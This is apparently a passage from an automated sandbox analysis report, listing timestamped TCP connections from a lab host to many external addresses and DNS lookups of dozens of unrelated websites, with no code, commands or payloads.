                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.528285027 CEST8049988188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.529541016 CEST4998880192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.529542923 CEST4972480192.168.2.4104.21.55.224
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.546324015 CEST8049724104.21.55.224192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.548001051 CEST4972480192.168.2.4104.21.55.224
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.660746098 CEST4971680192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.661958933 CEST4998980192.168.2.4104.21.55.224
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.663949013 CEST4999080192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.678124905 CEST8049989104.21.55.224192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.679363012 CEST4998980192.168.2.4104.21.55.224
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.679487944 CEST8049716192.124.249.10192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.679550886 CEST4971680192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.681176901 CEST4973280192.168.2.439.99.233.155
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.682611942 CEST8049990192.124.249.10192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.682643890 CEST4998980192.168.2.4104.21.55.224
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.682710886 CEST4999080192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.683729887 CEST4999180192.168.2.451.79.51.72
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.685020924 CEST4999080192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.685225010 CEST4999280192.168.2.439.99.233.155
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.685276031 CEST4970280192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.686992884 CEST4999380192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.688934088 CEST4974980192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.689852953 CEST4999480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.699542999 CEST8049989104.21.55.224192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.702052116 CEST8049702188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.702128887 CEST4970280192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.704087973 CEST8049993188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.704432964 CEST8049990192.124.249.10192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.704541922 CEST4999380192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.704854965 CEST8049990192.124.249.10192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.705106974 CEST4999080192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.706059933 CEST8049994104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.706098080 CEST8049749104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.706152916 CEST4999480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.706168890 CEST4974980192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.721318007 CEST8049989104.21.55.224192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.721394062 CEST4998980192.168.2.4104.21.55.224
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.728837013 CEST4999380192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.728884935 CEST4999480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.743156910 CEST4974180192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.743522882 CEST4999080192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.745151043 CEST8049993188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.745177031 CEST8049994104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.759073973 CEST8049993188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.759167910 CEST4999380192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.760978937 CEST8049741188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.761070013 CEST4974180192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.763204098 CEST4999580192.168.2.496.127.180.42
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.763991117 CEST8049990192.124.249.10192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.764056921 CEST4999080192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.778793097 CEST4999680192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.786346912 CEST804999151.79.51.72192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.786439896 CEST4999180192.168.2.451.79.51.72
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.794867992 CEST8049996188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.795244932 CEST4999680192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.910918951 CEST4999180192.168.2.451.79.51.72
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.930279970 CEST4999680192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.946413040 CEST8049996188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.988377094 CEST804999239.99.233.155192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.988524914 CEST4999280192.168.2.439.99.233.155
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:21.011157036 CEST4999280192.168.2.439.99.233.155
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:21.012734890 CEST804999151.79.51.72192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:21.012908936 CEST804999151.79.51.72192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:21.012995958 CEST4999180192.168.2.451.79.51.72
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:21.026051044 CEST4999180192.168.2.451.79.51.72
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:21.057017088 CEST4972080192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:21.058140993 CEST4999780192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:21.058195114 CEST4999880192.168.2.469.163.239.62
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:21.058774948 CEST4999980192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:21.076625109 CEST8049720188.165.133.163192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:21.076864958 CEST4972080192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:21.078185081 CEST8049999188.165.133.163192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:21.078295946 CEST4999980192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:21.078670025 CEST4999980192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:21.081731081 CEST5000080192.168.2.454.161.222.85
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:21.098108053 CEST8049999188.165.133.163192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:21.098149061 CEST8049999188.165.133.163192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:21.098216057 CEST4999980192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:21.123395920 CEST4999980192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.068687916 CEST192.168.2.48.8.8.80xa07aStandard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.069788933 CEST192.168.2.48.8.8.80x919aStandard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.072380066 CEST192.168.2.48.8.8.80x9fe4Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.073999882 CEST192.168.2.48.8.8.80x4034Standard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.075881004 CEST192.168.2.48.8.8.80xf64dStandard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.077817917 CEST192.168.2.48.8.8.80xe878Standard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.079855919 CEST192.168.2.48.8.8.80x498dStandard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.081233978 CEST192.168.2.48.8.8.80xd729Standard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.082401037 CEST192.168.2.48.8.8.80x7da7Standard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.083134890 CEST192.168.2.48.8.8.80xe5ecStandard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.480726957 CEST192.168.2.48.8.8.80xa58bStandard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.481204033 CEST192.168.2.48.8.8.80xb1efStandard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.501000881 CEST192.168.2.48.8.8.80xfb5dStandard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.778194904 CEST192.168.2.48.8.8.80x300fStandard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.233433008 CEST192.168.2.48.8.8.80x28cdStandard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.238261938 CEST192.168.2.48.8.8.80xe6ffStandard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.243911982 CEST192.168.2.48.8.8.80xdd4dStandard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.243980885 CEST192.168.2.48.8.8.80xb9fdStandard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.319538116 CEST192.168.2.48.8.8.80x3be4Standard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.328416109 CEST192.168.2.48.8.8.80x4f45Standard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.339773893 CEST192.168.2.48.8.8.80x5697Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.350292921 CEST192.168.2.48.8.8.80x8dd5Standard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.357852936 CEST192.168.2.48.8.8.80x330bStandard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.675595045 CEST192.168.2.48.8.8.80xde79Standard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.676506042 CEST192.168.2.48.8.8.80xa687Standard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.700064898 CEST192.168.2.48.8.8.80x4b52Standard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.065412998 CEST192.168.2.48.8.8.80x741bStandard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.141689062 CEST192.168.2.48.8.8.80x6a62Standard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.141872883 CEST192.168.2.48.8.8.80x3262Standard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.146229029 CEST192.168.2.48.8.8.80x951cStandard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.148329973 CEST192.168.2.48.8.8.80x7f5eStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.239891052 CEST192.168.2.48.8.8.80x27e5Standard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.322391987 CEST192.168.2.48.8.8.80x7e03Standard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.471838951 CEST192.168.2.48.8.8.80xb583Standard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.473020077 CEST192.168.2.48.8.8.80x3071Standard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.804578066 CEST192.168.2.48.8.8.80xb3aaStandard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.805121899 CEST192.168.2.48.8.8.80x26f4Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.820384979 CEST192.168.2.48.8.8.80x7fdeStandard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.825376034 CEST192.168.2.48.8.8.80x9ba3Standard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.908324957 CEST192.168.2.48.8.8.80x4873Standard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.229348898 CEST192.168.2.48.8.8.80x6f26Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.284394979 CEST192.168.2.48.8.8.80xfb5dStandard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.119350910 CEST192.168.2.48.8.8.80xbaf4Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.123142004 CEST192.168.2.48.8.8.80xfbd6Standard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.137567997 CEST192.168.2.48.8.8.80x63f6Standard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.141213894 CEST192.168.2.48.8.8.80x367eStandard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.147675991 CEST192.168.2.48.8.8.80x711dStandard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.151027918 CEST192.168.2.48.8.8.80xcf0dStandard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.152098894 CEST192.168.2.48.8.8.80x6190Standard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.267296076 CEST192.168.2.48.8.8.80x6f26Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.332703114 CEST192.168.2.48.8.8.80x6a42Standard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.666666985 CEST192.168.2.48.8.8.80xa6baStandard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.717859030 CEST192.168.2.48.8.8.80xdc6eStandard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.829283953 CEST192.168.2.48.8.8.80xca00Standard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.830434084 CEST192.168.2.48.8.8.80x7ee4Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.845040083 CEST192.168.2.48.8.8.80x2e16Standard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.849180937 CEST192.168.2.48.8.8.80x8ae7Standard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.091578960 CEST192.168.2.48.8.8.80xab38Standard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.124233007 CEST192.168.2.48.8.8.80xd4d8Standard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.371711016 CEST192.168.2.48.8.8.80xa3b5Standard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.396018982 CEST192.168.2.48.8.8.80x92a1Standard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.415769100 CEST192.168.2.48.8.8.80xf0dStandard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.929711103 CEST192.168.2.48.8.8.80x551Standard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.929805040 CEST192.168.2.48.8.8.80x155aStandard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.933033943 CEST192.168.2.48.8.8.80x2f96Standard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.937129021 CEST192.168.2.48.8.8.80xbc36Standard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:26.206011057 CEST192.168.2.48.8.8.80xcf07Standard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:26.223707914 CEST192.168.2.48.8.8.80xa011Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:26.544547081 CEST192.168.2.48.8.8.80x8024Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:26.583986998 CEST192.168.2.48.8.8.80x3f98Standard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:26.585817099 CEST192.168.2.48.8.8.80x4df4Standard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:27.489779949 CEST192.168.2.48.8.8.80xd90fStandard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:27.506459951 CEST192.168.2.48.8.8.80x78eStandard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:28.207968950 CEST192.168.2.48.8.8.80x2df2Standard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:29.488599062 CEST192.168.2.48.8.8.80xb1f6Standard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:30.202529907 CEST192.168.2.48.8.8.80x4023Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:42.189198971 CEST192.168.2.48.8.8.80x502eStandard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:43.321417093 CEST192.168.2.48.8.8.80x25ccStandard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.236357927 CEST192.168.2.48.8.8.80x5366Standard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.810918093 CEST192.168.2.48.8.8.80xb425Standard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.257579088 CEST192.168.2.48.8.8.80x7a7fStandard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.873811007 CEST192.168.2.48.8.8.80x6608Standard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.390167952 CEST192.168.2.48.8.8.80x83dfStandard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.413544893 CEST192.168.2.48.8.8.80x34cStandard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.936536074 CEST192.168.2.48.8.8.80x1af2Standard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.985151052 CEST192.168.2.48.8.8.80x184eStandard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.315978050 CEST192.168.2.48.8.8.80xbf53Standard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.436559916 CEST192.168.2.48.8.8.80x9532Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.488018036 CEST192.168.2.48.8.8.80x4b28Standard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.035171032 CEST192.168.2.48.8.8.80xf69eStandard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.264599085 CEST192.168.2.48.8.8.80xe5e7Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.305008888 CEST192.168.2.48.8.8.80x4977Standard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.374274015 CEST192.168.2.48.8.8.80xc27dStandard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.805094004 CEST192.168.2.48.8.8.80xe4e4Standard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:50.123878002 CEST192.168.2.48.8.8.80xea2Standard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:50.338388920 CEST192.168.2.48.8.8.80xa9d7Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.888443947 CEST192.168.2.48.8.8.80xec3dStandard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.895219088 CEST192.168.2.48.8.8.80x9427Standard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.897111893 CEST192.168.2.48.8.8.80x422cStandard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.908427000 CEST192.168.2.48.8.8.80x8ff5Standard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.910172939 CEST192.168.2.48.8.8.80x6fa1Standard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.914963007 CEST192.168.2.48.8.8.80xf632Standard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.923823118 CEST192.168.2.48.8.8.80x7f89Standard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.928231955 CEST192.168.2.48.8.8.80x2608Standard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.951098919 CEST192.168.2.48.8.8.80x6309Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.951231003 CEST192.168.2.48.8.8.80x94beStandard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.262190104 CEST192.168.2.48.8.8.80x7c4eStandard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.287314892 CEST192.168.2.48.8.8.80x9d52Standard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.310956955 CEST192.168.2.48.8.8.80x4a33Standard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.338179111 CEST192.168.2.48.8.8.80xf2fbStandard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.749875069 CEST192.168.2.48.8.8.80x7766Standard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.783380985 CEST192.168.2.48.8.8.80x8aeStandard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.786021948 CEST192.168.2.48.8.8.80xaf4bStandard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.788454056 CEST192.168.2.48.8.8.80xc673Standard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.880501986 CEST192.168.2.48.8.8.80xaff6Standard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.882925987 CEST192.168.2.48.8.8.80x2872Standard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.986550093 CEST192.168.2.48.8.8.80xf549Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.135770082 CEST192.168.2.48.8.8.80x1e13Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.139625072 CEST192.168.2.48.8.8.80x3445Standard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.237447023 CEST192.168.2.48.8.8.80xbeccStandard query (0)www.abart.plA (IP address)IN (0x0001)false
